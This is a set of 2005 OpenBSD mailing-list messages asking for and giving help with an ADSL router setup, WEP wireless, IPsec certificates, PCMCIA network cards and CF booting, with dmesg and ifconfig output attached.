Re: OpenBSD as a router for my ADSL ?

[Jonathan Gray]

On Sun, Nov 13, 2005 at 12:52:32PM +0300, Bruno Carnazzi wrote:
>Hi all,
> 
> My all-in-one router/switch/ADSL modem/AP just crashed (power
> failure). Damned. Back to my USB modem :( I've also set an OpenBSD 3.8
> box at home, on a Toshiba Laptop (4000CDS, PII-233MHz, 32Mo RAM, 4Go
> IDE HD). Let's rethink our Internet acces :)
> 
> Currenlty, I just have 1 NIC (PCMCIA, works well), but I'll buy a
> second. I'd like to make this OBSD box my filtering router/NAT for my
> Internet access. Here's the scenarii :
> 
>   * Try to use this SAGEM [EMAIL PROTECTED] 800 E2L. Uhm... OBSD recognized 
> it as
> ugen0 (ueagle seems not to work). Let's admit that it worked : can my
> CPU sustained the PPPoA at 2Mbps ? I've read it generates an heavy CPU
> load (maybe because of the USB port). Also, it's an USB 1.0 port. I
> don't think this way is a good idea :)

ueagle seems to not be enabled in the default kernel for some
reason.  You will have to build a custom kernel with it uncommented.

Additionally you will have to install the firmware in the locations
the man page talks about.
http://www.openbsd.org/cgi-bin/man.cgi?query=ueagle&apropos=0&sektion=0&manpath=OpenBSD+Current&arch=i386&format=html

If it still doesn't work after that report back with the output
of usbdevs -v.

Re: OpenBSD Desktop Document

[Derek Tracy]

Now that I would have to see. Could you do up a quick sketch in ascii?

On 11/13/05, Robert Szasz <[EMAIL PROTECTED]> wrote:
>
> Add a cutout disk partitioning sliderule! Ok, perhaps not, but now that I
> think about it, that would be a nice geeky tool to have. If anyone else is
> interested, I might just make one up.
>
> On 11/12/05, Derek Tracy <[EMAIL PROTECTED]> wrote:
> >
> > I have to agree, Gentoo's install docs are some of the best out there
> > and
> > will allow just about anybody to install OpenBSD.
> >
> > On 11/12/05, bofh <[EMAIL PROTECTED]> wrote:
> > >
> > > On 11/8/05, Joe S <[EMAIL PROTECTED]> wrote:
> > > >
> > > > In general, this is a good start. One more piece of advice, try not
> > to
> > > > make the document too narrative, but rather just put in what the
> > user
> > > > needs to know to get a desktop working.
> > >
> > >
> > >
> > > One piece of advice, take a look at gentoo's install docs. Just enough
> > > handholding, but with enough background explanation so that a user
> > knows
> > > what's going on.
> > >
> > > -Tai
> > >
> > >
> >
> >
> > --
> > -
> > Derek Tracy
> > [EMAIL PROTECTED]
> > -
> >
> >
>


--
-
Derek Tracy
[EMAIL PROTECTED]
-

Re: OpenBSD as a router for my ADSL ?

[Bruno Carnazzi]

OpenBSD 3.8 (GENERIC) #138: Sat Sep 10 15:41:37 MDT 2005
[EMAIL PROTECTED]:/usr/src/sys/arch/i386/compile/GENERIC
cpu0: Intel Pentium II ("GenuineIntel" 686-class, 512KB L2 cache) 233 MHz
cpu0: 
FPU,V86,DE,PSE,TSC,MSR,PAE,MCE,CX8,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36,MMX,FXSR
real mem  = 33071104 (32296K)
avail mem = 22192128 (21672K)
using 429 buffers containing 1757184 bytes (1716K) of memory
mainbus0 (root)
bios0 at mainbus0: AT/286+(63) BIOS, date 09/07/98, BIOS32 rev. 0 @ 0xfc2c0
apm0 at bios0: Power Management spec V1.2
apm0: battery life expectancy 100%
apm0: AC on, battery charge high, estimated 3:26 hours
apm0: flags 20102 dobusy 0 doidle 1
pcibios0 at bios0: rev 2.1 @ 0xf/0x1
pcibios0: PCI IRQ Routing Table rev 1.0 @ 0xf01c0/96 (4 entries)
pcibios0: PCI Interrupt Router at 000:07:0 ("Intel 82371FB ISA" rev 0x00)
pcibios0: PCI bus #2 is the last bus
WARNING: can't reserve area for I/O APIC.
WARNING: can't reserve area for Local APIC.
bios0: ROM list: 0xc/0xc000
cpu0 at mainbus0
pci0 at mainbus0 bus 0: configuration mode 1 (no bios)
pchb0 at pci0 dev 0 function 0 "Intel 82443BX" rev 0x02
cbb0 at pci0 dev 2 function 0 "Toshiba ToPIC97 CardBus" rev 0x05: irq 11
cbb1 at pci0 dev 2 function 1 "Toshiba ToPIC97 CardBus" rev 0x05: irq 11
vga1 at pci0 dev 4 function 0 "Chips and Technologies 6" rev 0xc6
wsdisplay0 at vga1 mux 1: console (80x25, vt100 emulation)
wsdisplay0: screen 1-5 added (80x25, vt100 emulation)
pcib0 at pci0 dev 7 function 0 "Intel 82371AB PIIX4 ISA" rev 0x02
pciide0 at pci0 dev 7 function 1 "Intel 82371AB IDE" rev 0x01: DMA,
channel 0 wired to compatibility, channel 1 wired to compatibility
wd0 at pciide0 channel 0 drive 0: 
wd0: 16-sector PIO, LBA, 4126MB, 8452080 sectors
wd0(pciide0:0:0): using PIO mode 4, Ultra-DMA mode 2
atapiscsi0 at pciide0 channel 1 drive 0
scsibus0 at atapiscsi0: 2 targets
cd0 at scsibus0 targ 0 lun 0:  SCSI0 5/cdrom removable
cd0(pciide0:1:0): using PIO mode 4, DMA mode 2
uhci0 at pci0 dev 7 function 2 "Intel 82371AB USB" rev 0x01: irq 11
usb0 at uhci0: USB revision 1.0
uhub0 at usb0
uhub0: Intel UHCI root hub, rev 1.00/1.00, addr 1
uhub0: 2 ports with 2 removable, self powered
"Intel 82371AB Power" rev 0x02 at pci0 dev 7 function 3 not configured
"Toshiba Fast Infrared Type O" rev 0x23 at pci0 dev 10 function 0 not configured
cardslot0 at cbb0 slot 0 flags 0
cardbus0 at cardslot0: bus 1 device 0 cacheline 0x0, lattimer 0x0
pcmcia0 at cardslot0
cardslot1 at cbb1 slot 1 flags 0
cardbus1 at cardslot1: bus 2 device 0 cacheline 0x0, lattimer 0x0
pcmcia1 at cardslot1
isa0 at pcib0
isadma0 at isa0
pckbc0 at isa0 port 0x60/5
pckbd0 at pckbc0 (kbd slot)
pckbc0: using irq 1 for kbd slot
wskbd0 at pckbd0: console keyboard, using wsdisplay0
pms0 at pckbc0 (aux slot)
pckbc0: using irq 12 for aux slot
wsmouse0 at pms0 mux 0
sb0 at isa0 port 0x220/24 irq 5 drq 1: dsp v3.01
midi0 at sb0: 
audio0 at sb0
opl0 at sb0: model OPL3
midi1 at opl0: 
wss0 at isa0 port 0x530/8 irq 10 drq 0: CS4231 or AD1845 (vers 4)
audio1 at wss0
pcppi0 at isa0 port 0x61
midi2 at pcppi0: 
spkr0 at pcppi0
sysbeep0 at pcppi0
lpt0 at isa0 port 0x378/4 irq 7
npx0 at isa0 port 0xf0/16: using exception 16
pccom0 at isa0 port 0x3f8/8 irq 4: ns16550a, 16 byte fifo
fdc0 at isa0 port 0x3f0/6 irq 6 drq 2
fd0 at fdc0 drive 0: 1.44MB 80 cyl, 2 head, 18 sec
biomask eb4d netmask eb4d ttymask fbcf
pctr: 686-class user-level performance counters enabled
mtrr: Pentium Pro MTRR support
ne3 at pcmcia0 function 0 "PCMCIA, FastEthernet, V" port 0xa300/32
ne3: address 00:10:60:f6:71:29
dkcsum: wd0 matches BIOS drive 0x80
root on wd0a
rootdev=0x0 rrootdev=0x300 rawdev=0x302
ugen0 at uhub0 port 1
ugen0: Analog Devices Eagle II, rev 1.10/50.00, addr 2
ugen0: at uhub0 port 1 (addr 2) disconnected
ugen0 detached
ugen0 at uhub0 port 1
ugen0: Analog Devices Eagle II, rev 1.10/50.00, addr 2
ugen0: at uhub0 port 1 (addr 2) disconnected
ugen0 detached

On 11/13/05, Stuart Henderson <[EMAIL PROTECTED]> wrote:
> --On 13 November 2005 12:52 +0300, Bruno Carnazzi wrote:
>
> >   * Try to use this SAGEM [EMAIL PROTECTED] 800 E2L. Uhm... OBSD recognized 
> > it as
> > ugen0 (ueagle seems not to work).
>
> ugen is used where a specific driver can't be found. Send your dmesg.

Re: WLAN (Linksys WPC111) + WEP

[Nikolaus Hiebaum]

Hi,

A while ago I posted here for help with my WLAN card (Linksys WPC11 v3). Here 
is my setup ...
I have a built-in LAN card (rl0) through which I am usually connected to my 
network. The there
is the WLAN card (wi0) which would connect via an Access Point (AP). All of 
this is funneled
via a Router

rl0 usually has 192.168.0.2
Router 192.168.0.100
wi0 would get 192.168.0.21

This is my netstat -rn and ifconfig in the usual setup (just rl0 connected to 
router)

---snip---
Routing tables

Internet:
DestinationGatewayFlags Refs UseMtu  Interface
default192.168.0.100  UGS 565505  -   rl0
127/8  127.0.0.1  UGRS00  33224   lo0
127.0.0.1  127.0.0.1  UH  1  396  33224   lo0
192.168.0/24   link#1 UC  20  -   rl0
192.168.0.100  0:c:41:c6:1:75 UHLc1 2180  -   rl0
192.168.0.255  link#1 UHLc3  848  -   rl0
224/4  127.0.0.1  URS 00  33224   lo0

Encap:
Source Port  DestinationPort  Proto 
SA(Address/Proto/Type/Direction)
lo0: flags=8049 mtu 33224
groups: lo
inet 127.0.0.1 netmask 0xff00
inet6 ::1 prefixlen 128
inet6 fe80::1%lo0 prefixlen 64 scopeid 0x5
rl0: flags=8843 mtu 1500
lladdr 00:0a:e4:4a:13:0b
groups: egress
media: Ethernet autoselect (100baseTX full-duplex)
status: active
inet 192.168.0.2 netmask 0xff00 broadcast 192.168.0.255
inet6 fe80::20a:e4ff:fe4a:130b%rl0 prefixlen 64 scopeid 0x1
pflog0: flags=0<> mtu 33224
pfsync0: flags=0<> mtu 1348
enc0: flags=0<> mtu 1536
---snap---

When I want to connect via the wi0, I down the rl0 and give it whole different 
IP. The chain
of commands is this:

ifconfig wi0 192.168.0.21 255.255.255.0 nwid scyld nwkey BACE8A21EA up

ifconfig rl0 10.0.0.0

route delete default

route add default 192.168.0.100

I need the nwkey for the WEP (64bit) encryption (open authentication). Both the 
AP, as well as
ifconfig, suggest that I am connected wireless, but I cannot ping anything.

---snip---
Routing tables

Internet:
DestinationGatewayFlags Refs UseMtu  Interface
default192.168.0.100  UGS 4   72  -   wi0
10/8   link#1 UC  10  -   rl0
10.255.255.255 link#1 UHLc2   42  -   rl0
127/8  127.0.0.1  UGRS00  33224   lo0
127.0.0.1  127.0.0.1  UH  1  396  33224   lo0
192.168.0/24   link#6 UC  20  -   wi0
192.168.0.100  link#6 UHRLc   10  -   wi0
192.168.0.255  link#6 UHLc3   21  -   wi0
224/4  127.0.0.1  URS 00  33224   lo0


lo0: flags=8049 mtu 33224
groups: lo
inet 127.0.0.1 netmask 0xff00
inet6 ::1 prefixlen 128
inet6 fe80::1%lo0 prefixlen 64 scopeid 0x5
rl0: flags=8843 mtu 1500
lladdr 00:0a:e4:4a:13:0b
groups: egress
media: Ethernet autoselect (100baseTX full-duplex)
status: active
inet 192.168.0.2 netmask 0xff00 broadcast 192.168.0.255
inet6 fe80::20a:e4ff:fe4a:130b%rl0 prefixlen 64 scopeid 0x1
pflog0: flags=0<> mtu 33224
pfsync0: flags=0<> mtu 1348
enc0: flags=0<> mtu 1536
wi0: flags=8843 mtu 1500
lladdr 00:06:25:2b:55:5c
media: IEEE802.11 autoselect (DS2)
status: active
ieee80211: nwid scyld nwkey  5dBm (auto)
inet6 fe80::206:25ff:fe2b:555c%wi0 prefixlen 64 scopeid 0x6
inet 192.168.0.21 netmask 0xff00 broadcast 255.255.255.0
---snap---

And still I cannot ping anything. As soon as I turn off WEP and have an 
unencrypted AP, I can
ping. What am I missing out here? Both ifconfig and the AP tell me, that I am 
connected, and
netstat says the routes are fine. What's the problem here?

-- 
Beste Gr|_e / Best regards ,
Nikolaus Hiebaum

Re: vpn between OpenBSD and Linux/Openswan with x509 certs

[Tom K]

Apologies for my formatting. To clarify:

laptop = 10.12.62.99
ipcop = 10.12.62.1

Tom K wrote:

I'm a complete beginner with OpenBSD, and I've just installed 3.8 on 
my laptop principally to learn the OpenBSD way of doing IPsec i.e. 
isakmpd and ipsecctl. My goal is to create a tunnel between OpenBSD 
and my existing Openswan system (IPCop 1.4.10) using x509 certs. I 
have a reasonably good understanding of Openswan, so basically I'm 
trying to understand the specifics of isakmpd/ipsecctl, rather than 
the underlying concepts.


Here's where I am so far:
ipsecctl has just been intoduced in 3.8 to simplify ipsec operations. 
It obsoletes isakmpd.conf. I can run isakmpd with no conf file, and 
ipsecctl with the following ipsec.conf file:


ike esp from 10.12.62.99 to 0.0.0.0/0 peer 10.12.62.1
|   |
laptopipcop

and I get some familiar-looking responses in Openswan's logs - so far 
so good. No tunnel, but that's OK for the moment.


What I'm not clear on is where I define the certs, if isakmpd.conf is 
no longer in use. There's no mention of them in man ipsecctl. Maybe I 
still need something like this in isakmpd.conf:


# Certificates stored in PEM format
  [X509-certificates]
  CA-directory=/etc/isakmpd/ca/
  Cert-directory=/etc/isakmpd/certs/
  Private-key=/etc/isakmpd/private/openbsd1.as10.net.priv

Am I on the right track? I would really appreciate any suggestions.

Thanks
Tom K.

Re: OpenBSD as a router for my ADSL ?

[Stuart Henderson]

--On 13 November 2005 12:52 +0300, Bruno Carnazzi wrote:


  * Try to use this SAGEM [EMAIL PROTECTED] 800 E2L. Uhm... OBSD recognized it 
as
ugen0 (ueagle seems not to work).


ugen is used where a specific driver can't be found. Send your dmesg.

vpn between OpenBSD and Linux/Openswan with x509 certs

[Tom K]

I'm a complete beginner with OpenBSD, and I've just installed 3.8 on my 
laptop principally to learn the OpenBSD way of doing IPsec i.e. isakmpd 
and ipsecctl. My goal is to create a tunnel between OpenBSD and my 
existing Openswan system (IPCop 1.4.10) using x509 certs. I have a 
reasonably good understanding of Openswan, so basically I'm trying to 
understand the specifics of isakmpd/ipsecctl, rather than the underlying 
concepts.


Here's where I am so far:
ipsecctl has just been intoduced in 3.8 to simplify ipsec operations. It 
obsoletes isakmpd.conf. I can run isakmpd with no conf file, and 
ipsecctl with the following ipsec.conf file:


ike esp from 10.12.62.99 to 0.0.0.0/0 peer 10.12.62.1
|   |
laptopipcop

and I get some familiar-looking responses in Openswan's logs - so far so 
good. No tunnel, but that's OK for the moment.


What I'm not clear on is where I define the certs, if isakmpd.conf is no 
longer in use. There's no mention of them in man ipsecctl. Maybe I still 
need something like this in isakmpd.conf:


# Certificates stored in PEM format
  [X509-certificates]
  CA-directory=/etc/isakmpd/ca/
  Cert-directory=/etc/isakmpd/certs/
  Private-key=/etc/isakmpd/private/openbsd1.as10.net.priv

Am I on the right track? I would really appreciate any suggestions.

Thanks
Tom K.

Re: Compaq ARMADA 100S with D-Link DFE-670TXD

[Bruno Carnazzi]

  Hello,

I've got an old notebook too (Toshiba 4000CDS) and my PCMCIA is a bit
strange too. During floppy installation, it's detected and mounted on
ne0, whereas normal execution, it's mounted as ne3. It's not hard to
fix the network configuration to handle this, but it make me think
that this driver is not very "clean"... I use a Sitecom PCMCIA 10/100
Ethernet adapter.

Best regards,

Bruno.

On 11/13/05, Peter Huncar <[EMAIL PROTECTED]> wrote:
> Hello
>
> I have an old notebook: Compaq Armada 100s and I was tryig to install OpenBSD 
> to
> use it as a neat diag. computer. After being unable to use the PCMCIA D-link
> DFE-670tdx ethernet adapter a while ago (after 3.7 release) I tried two linux
> distros (ubuntu and slackware) both working fine (and the PCMCIA card worked),
> actualy there was win98 before and worked fine also.
>
> After releasing of 3.8 I tried OpenBSD again without success, but I played a 
> bit
> longer with.
>
> When booting from floppy there is a 70% chance that the kernel recognizes the
> PCMCIA card (ne3) but after trying to use it I got device timeout.
>
> I tried more than 10 times 3.8 bsd.rd without kernel being able to even
> recognize the card. After installing the system from CD without initializing
> the network, the default generic kernel has the same problem, I tried it many
> times. Seems like (tried generic and rd approx 30times together) only the
> floppy install kernel has a chance to recognize the pcmcia card, or maybe I am
> wrong, and it's a hardware issue. Anyway as I mentioned above ubuntu for
> example (3 tries ;o) )
> has no problem with this combination.
>
> I linked two dmesg outputs one from generic kernel boot and the another with 
> the
> floppy boot with the card recognized.
>
> Is there a way to make this work?
>
> Thank you all, great job.
>
> Peter Huncar
>
>
> 
> This message was sent using IMP, the Internet Messaging Program.
> OpenBSD 3.8 (RAMDISK) #793: Sat Sep 10 16:02:31 MDT 2005
> [EMAIL PROTECTED]:/usr/src/sys/arch/i386/compile/RAMDISK
> cpu0: AMD-K6(tm)-III Processor ("AuthenticAMD" 586-class) 534 MHz
> cpu0: FPU,V86,DE,PSE,TSC,MSR,MCE,CX8,PGE,MMX
> real mem  = 58236928 (56872K)
> avail mem = 48136192 (47008K)
> using 736 buffers containing 3014656 bytes (2944K) of memory
> mainbus0 (root)
> bios0 at mainbus0: AT/286+(f0) BIOS, date 01/28/00, BIOS32 rev. 0 @ 0xeb650
> apm0 at bios0: Power Management spec V1.2
> apm0: flags 30102 dobusy 0 doidle 1
> pcibios0 at bios0: rev 2.1 @ 0xe8000/0x67d
> pcibios0: PCI IRQ Routing Table rev 1.0 @ 0xfe840/80 (3 entries)
> pcibios0: PCI Interrupt Router at 000:07:0 ("VIA VT82C596A ISA" rev 0x00)
> pcibios0: PCI bus #2 is the last bus
> bios0: ROM list: 0xc/0xc000! 0xcc000/0x1000 0xe4000/0xc00!
> cpu0 at mainbus0
> pci0 at mainbus0 bus 0: configuration mode 1 (no bios)
> pchb0 at pci0 dev 0 function 0 "VIA VT8501" rev 0x04
> ppb0 at pci0 dev 1 function 0 "VIA VT8501 AGP" rev 0x00
> pci1 at ppb0 bus 1
> vga1 at pci1 dev 0 function 0 "Trident CyberBlade i7 AGP" rev 0x5d
> wsdisplay0 at vga1 mux 1: console (80x25, vt100 emulation)
> pcib0 at pci0 dev 7 function 0 "VIA VT82C686 ISA" rev 0x22
> pciide0 at pci0 dev 7 function 1 "VIA VT82C571 IDE" rev 0x10: ATA66, channel 
> 0 configured to compatibility, channel 1 configured to compatibility
> wd0 at pciide0 channel 0 drive 0: 
> wd0: 16-sector PIO, LBA, 4769MB, 9767520 sectors
> wd0(pciide0:0:0): using PIO mode 4, Ultra-DMA mode 4
> atapiscsi0 at pciide0 channel 1 drive 0
> scsibus0 at atapiscsi0: 2 targets
> cd0 at scsibus0 targ 0 lun 0:  SCSI0 5/cdrom removable
> cd0(pciide0:1:0): using PIO mode 4, DMA mode 2
> "VIA VT83C572 USB" rev 0x10 at pci0 dev 7 function 2 not configured
> "VIA VT82C686 SMBus" rev 0x30 at pci0 dev 7 function 4 not configured
> "VIA VT82C686 AC97" rev 0x20 at pci0 dev 7 function 5 not configured
> "VIA VT82C686 Modem" rev 0x20 at pci0 dev 7 function 6 not configured
> "Texas Instruments PCI1211 CardBus" rev 0x00 at pci0 dev 10 function 0 not 
> configured
> isa0 at pcib0
> isadma0 at isa0
> pckbc0 at isa0 port 0x60/5
> pckbd0 at pckbc0 (kbd slot)
> pckbc0: using irq 1 for kbd slot
> wskbd0 at pckbd0: console keyboard, using wsdisplay0
> npx0 at isa0 port 0xf0/16: using exception 16
> pccom0 at isa0 port 0x3f8/8 irq 4: ns16550a, 16 byte fifo
> pccom1 at isa0 port 0x2f8/8 irq 3: ns16550a, 16 byte fifo
> fdc0 at isa0 port 0x3f0/6 irq 6 drq 2
> fd0 at fdc0 drive 0: 1.44MB 80 cyl, 2 head, 18 sec
> pcic0 at isa0 port 0x3e0/2 iomem 0xd/16384
> pcic0 controller 0:  has sockets A and B
> pcmcia0 at pcic0 controller 0 socket 0
> ne3 at pcmcia0 function 0 "D-Link, DFE-670TXD, PC Card" port 0x340/32, irq 11
> ne3: address 00:11:95:23:6d:99
> nsphyter0 at ne3 phy 1: DP83815 10/100 PHY, rev. 0
> pcmcia1 at pcic0 controller 0 socket 1
> pcic0: irq 9, polling enabled
> biomask f5e5 netmask fde5 ttymask ffe7
> rd0: fixed, 3800 blocks
> dkcsum: wd0 matches BIOS drive 0x80
> root on 

Compaq ARMADA 100S with D-Link DFE-670TXD

[Peter Huncar]

Hello

I have an old notebook: Compaq Armada 100s and I was tryig to install OpenBSD to
use it as a neat diag. computer. After being unable to use the PCMCIA D-link
DFE-670tdx ethernet adapter a while ago (after 3.7 release) I tried two linux
distros (ubuntu and slackware) both working fine (and the PCMCIA card worked),
actualy there was win98 before and worked fine also.

After releasing of 3.8 I tried OpenBSD again without success, but I played a bit
longer with.

When booting from floppy there is a 70% chance that the kernel recognizes the
PCMCIA card (ne3) but after trying to use it I got device timeout.

I tried more than 10 times 3.8 bsd.rd without kernel being able to even
recognize the card. After installing the system from CD without initializing
the network, the default generic kernel has the same problem, I tried it many
times. Seems like (tried generic and rd approx 30times together) only the
floppy install kernel has a chance to recognize the pcmcia card, or maybe I am
wrong, and it's a hardware issue. Anyway as I mentioned above ubuntu for
example (3 tries ;o) )
has no problem with this combination.

I linked two dmesg outputs one from generic kernel boot and the another with the
floppy boot with the card recognized.

Is there a way to make this work?

Thank you all, great job.

Peter Huncar



This message was sent using IMP, the Internet Messaging Program.
OpenBSD 3.8 (RAMDISK) #793: Sat Sep 10 16:02:31 MDT 2005
[EMAIL PROTECTED]:/usr/src/sys/arch/i386/compile/RAMDISK
cpu0: AMD-K6(tm)-III Processor ("AuthenticAMD" 586-class) 534 MHz
cpu0: FPU,V86,DE,PSE,TSC,MSR,MCE,CX8,PGE,MMX
real mem  = 58236928 (56872K)
avail mem = 48136192 (47008K)
using 736 buffers containing 3014656 bytes (2944K) of memory
mainbus0 (root)
bios0 at mainbus0: AT/286+(f0) BIOS, date 01/28/00, BIOS32 rev. 0 @ 0xeb650
apm0 at bios0: Power Management spec V1.2
apm0: flags 30102 dobusy 0 doidle 1
pcibios0 at bios0: rev 2.1 @ 0xe8000/0x67d
pcibios0: PCI IRQ Routing Table rev 1.0 @ 0xfe840/80 (3 entries)
pcibios0: PCI Interrupt Router at 000:07:0 ("VIA VT82C596A ISA" rev 0x00)
pcibios0: PCI bus #2 is the last bus
bios0: ROM list: 0xc/0xc000! 0xcc000/0x1000 0xe4000/0xc00!
cpu0 at mainbus0
pci0 at mainbus0 bus 0: configuration mode 1 (no bios)
pchb0 at pci0 dev 0 function 0 "VIA VT8501" rev 0x04
ppb0 at pci0 dev 1 function 0 "VIA VT8501 AGP" rev 0x00
pci1 at ppb0 bus 1
vga1 at pci1 dev 0 function 0 "Trident CyberBlade i7 AGP" rev 0x5d
wsdisplay0 at vga1 mux 1: console (80x25, vt100 emulation)
pcib0 at pci0 dev 7 function 0 "VIA VT82C686 ISA" rev 0x22
pciide0 at pci0 dev 7 function 1 "VIA VT82C571 IDE" rev 0x10: ATA66, channel 0 
configured to compatibility, channel 1 configured to compatibility
wd0 at pciide0 channel 0 drive 0: 
wd0: 16-sector PIO, LBA, 4769MB, 9767520 sectors
wd0(pciide0:0:0): using PIO mode 4, Ultra-DMA mode 4
atapiscsi0 at pciide0 channel 1 drive 0
scsibus0 at atapiscsi0: 2 targets
cd0 at scsibus0 targ 0 lun 0:  SCSI0 5/cdrom removable
cd0(pciide0:1:0): using PIO mode 4, DMA mode 2
"VIA VT83C572 USB" rev 0x10 at pci0 dev 7 function 2 not configured
"VIA VT82C686 SMBus" rev 0x30 at pci0 dev 7 function 4 not configured
"VIA VT82C686 AC97" rev 0x20 at pci0 dev 7 function 5 not configured
"VIA VT82C686 Modem" rev 0x20 at pci0 dev 7 function 6 not configured
"Texas Instruments PCI1211 CardBus" rev 0x00 at pci0 dev 10 function 0 not 
configured
isa0 at pcib0
isadma0 at isa0
pckbc0 at isa0 port 0x60/5
pckbd0 at pckbc0 (kbd slot)
pckbc0: using irq 1 for kbd slot
wskbd0 at pckbd0: console keyboard, using wsdisplay0
npx0 at isa0 port 0xf0/16: using exception 16
pccom0 at isa0 port 0x3f8/8 irq 4: ns16550a, 16 byte fifo
pccom1 at isa0 port 0x2f8/8 irq 3: ns16550a, 16 byte fifo
fdc0 at isa0 port 0x3f0/6 irq 6 drq 2
fd0 at fdc0 drive 0: 1.44MB 80 cyl, 2 head, 18 sec
pcic0 at isa0 port 0x3e0/2 iomem 0xd/16384
pcic0 controller 0:  has sockets A and B
pcmcia0 at pcic0 controller 0 socket 0
ne3 at pcmcia0 function 0 "D-Link, DFE-670TXD, PC Card" port 0x340/32, irq 11
ne3: address 00:11:95:23:6d:99
nsphyter0 at ne3 phy 1: DP83815 10/100 PHY, rev. 0
pcmcia1 at pcic0 controller 0 socket 1
pcic0: irq 9, polling enabled
biomask f5e5 netmask fde5 ttymask ffe7
rd0: fixed, 3800 blocks
dkcsum: wd0 matches BIOS drive 0x80
root on rd0a
rootdev=0x1100 rrootdev=0x2f00 rawdev=0x2f02
OpenBSD 3.8 (GENERIC) #138: Sat Sep 10 15:41:37 MDT 2005
[EMAIL PROTECTED]:/usr/src/sys/arch/i386/compile/GENERIC
cpu0: AMD-K6(tm)-III Processor ("AuthenticAMD" 586-class) 534 MHz
cpu0: FPU,V86,DE,PSE,TSC,MSR,MCE,CX8,PGE,MMX
real mem  = 58236928 (56872K)
avail mem = 45486080 (44420K)
using 736 buffers containing 3014656 bytes (2944K) of memory
mainbus0 (root)
bios0 at mainbus0: AT/286+(f0) BIOS, date 01/28/00, BIOS32 rev. 0 @ 0xeb650
apm0 at bios0: Power Management spec V1.2
apm0: battery life expectancy 99%
apm0: AC on, battery charge unknown, charging, estimated 0:02 hours
apm0: fl

Re: OpenBSD as a router for my ADSL ?

[Jasper Lievisse Adriaanse]

On Sun, 13 Nov 2005 12:52:32 +0300
Bruno Carnazzi <[EMAIL PROTECTED]> wrote:

[...]
> 
>   * Try to use this SAGEM [EMAIL PROTECTED] 800 E2L. Uhm... OBSD recognized 
> it as
> ugen0 (ueagle seems not to work).
[..]
 
Read "man 4 ugen" and you would've noticed that your modem will probaly work
with the tun(4) driver, like my USB modem.

> Best regards,
> 
> Bruno.
> 
Cheers,
Jasper


-- 
"Security is decided by quality" -- Theo de Raadt

OpenBSD as a router for my ADSL ?

[Bruno Carnazzi]

   Hi all,

My all-in-one router/switch/ADSL modem/AP just crashed (power
failure). Damned. Back to my USB modem :( I've also set an OpenBSD 3.8
box at home, on a Toshiba Laptop (4000CDS, PII-233MHz, 32Mo RAM, 4Go
IDE HD). Let's rethink our Internet acces :)

Currenlty, I just have 1 NIC (PCMCIA, works well), but I'll buy a
second. I'd like to make this OBSD box my filtering router/NAT for my
Internet access. Here's the scenarii :

  * Try to use this SAGEM [EMAIL PROTECTED] 800 E2L. Uhm... OBSD recognized it 
as
ugen0 (ueagle seems not to work). Let's admit that it worked : can my
CPU sustained the PPPoA at 2Mbps ? I've read it generates an heavy CPU
load (maybe because of the USB port). Also, it's an USB 1.0 port. I
don't think this way is a good idea :)

  * Buy an ADSL modem and configure it as a bridge (and buy a second
NIC for my OBSD box). This way, I've got a public IP on the router
through PPPoE. As I don't use USB, will my CPU handle correctly the
traffic ? Uhm... Seems good.

  * Buy an ADSL router. This way, public IP is on the router, and I
have to create a pseudo-public LAN between my ADSL router and my OBSD
box. Latter, I'd like to build some IPSec tunnel from OBSD. I think
this way of doing will bother me with IPSec, no ?

   * Go live in the mountains, and keep far from technology... Uhm,
seems good too :)

Thank you for your advices,

Best regards,

Bruno.

Re: Building a bootable CF w/ a RAM-disk kernel

[Damien Miller]

On Sat, 12 Nov 2005 21:54:42 -0600
J Moore <[EMAIL PROTECTED]> wrote:

> The readme file in flashboot contains an overview of building the 
> ram-disk kernel. What it doesn't explain is how to install the kernel on 
> the CF, or prepare the CF for booting the kernel.

There are some extra instructions in the latest version of the README:
http://cvsweb.mindrot.org/index.cgi/~checkout~/flashboot/README?rev=HEAD

These start by recommending that you read the boot(8) and 
installboot(8) manpages.

-d